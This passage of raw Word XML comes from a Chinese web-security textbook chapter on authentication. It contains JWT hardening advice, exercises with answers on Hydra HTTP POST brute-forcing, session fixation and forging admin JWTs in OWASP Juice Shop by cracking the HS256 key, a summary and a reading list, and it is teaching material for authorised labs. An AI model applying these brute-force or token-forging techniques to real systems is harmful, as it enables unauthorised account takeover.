              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">alg</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">为</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">none</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">或非白名单算法的请求。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">使用非对称算法（RS256/ES256）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">优先选用非对称签名，避免私钥泄漏并根本性消除算法混淆中“将公钥当</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> HMAC </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">密钥”的风险。若必须用</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">HS256，务必生成具备高熵的长随机密钥（至少</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 256 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">位）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">短时效</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> access token + refresh token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">access token </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">的有效期设定为分钟级别（如</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 15 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">分钟），即便被窃取也仅短时间有效；刷新须重新认证或出示</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> refresh token。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">审计与异常检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">监控同一</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> token </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">在多个</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">间的频繁使用（潜在</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> token </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">窃取），以及频繁的</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> token </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">刷新失败尝试（可能指示猜测</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> refresh </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">token）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="200"/>
    <w:bookmarkStart w:id="201" w:name="习题-12"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1（概念复述）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：什么条件下在线爆破对认证系统构成实质威胁？简述</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hydra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">爆破时要正确指定的三个核心要素。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：关注口令空间熵和速率限制是否存在；Hydra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">核心要素从命令行参数推测。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：口令弱（低熵）且无有效速率限制/锁定时成立。三要素：登录路径与参数表、失败标记字符串（或响应码）以及用户名/口令的负载占位符</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">^USER^</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">^PASS^</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2（推理性）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：会话固定的本质在哪一条安全假设上？为什么即使系统使用了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS，会话固定仍然可能成功？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：关注</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在认证前后的状态变化，以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">保护的是什么。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：本质在于假设“登录后所用的会话与登录前匿名会话无关”——固定攻击恰恰让二者绑定。HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">保护的是传输过程的机密性与完整性，但阻止不了攻击者提前准备一个已知的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并通过社工等方式植入受害者连接；攻击者无需窃听网络，他只利用“已知的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被服务端接受”的逻辑缺陷。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3（迁移实战）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之外，搭建一个开源的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脆弱环境（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Juice Shop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Academy JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab），自行演示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alg=none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或弱密钥的情形。要求：①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录原始</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与修改后的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT；②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分析为何服务端会接受伪造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">token；③</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">给出代码层面的修复措施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：可在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Juice </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Shop（OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方维护的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Node.js </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脆弱商店应用，Docker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部署）的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/rest/user/login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中体验</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">弱密钥挑战。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：尝试在不使用已知弱口令的情况下，通过分析</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Juice Shop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">签发逻辑，爆破出其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HS256 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">签名密钥（可借助</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jwt_tool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），然后为自己签发管理员</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> token。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="201"/>
    <w:bookmarkStart w:id="202" w:name="小结-14"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1117"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">弱口令爆破违反“口令不可猜测”假设，利用真实登录接口和候选字典进行在线穷举，Hydra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是授权测试的核心工具。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1117"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">速率限制、账户锁定和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MFA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是化解在线爆破的经典组合；蓝队可通过登录失败频率的异常变化识别攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1117"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话固定源于服务端未在认证时刻轮换</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID，使攻击者能够预设会话并搭桥进入已认证状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1117"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alg=none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和算法混淆等误用，将本应提供完整性的签名机制变成短路开关——服务端必须强制算法白名单并选择强随机密钥。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1117"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证与会话安全是纵深防御的第一环：强口令策略、安全会话管理、MFA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和令牌短时效联合构成健壮的凭据生命周期防护。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="202"/>
    <w:bookmarkStart w:id="203" w:name="延伸阅读-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1118"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Stuttard–Pinto《The Web Application Hacker’s Handbook》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（Authentication）与第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（Session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Management），对认证与会话的攻防原理有系统化阐述。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1118"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Testing Guide</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的“Testing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication”与“Testing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Management”模块，提供了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与手动结合的逐项检出方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1118"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Web Security Academy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Authentication </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">专题的免费交互式实验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1118"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Georgia Weidman《Penetration Testing: A Hands-On Introduction to Hacking》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hydra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与口令攻击的综合演示（请注意视频/环境中攻击目标均为授权实验节点）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1118"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Aumasson《Serious Cryptography》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对</w:t>
      </w:r>
      <w:r>
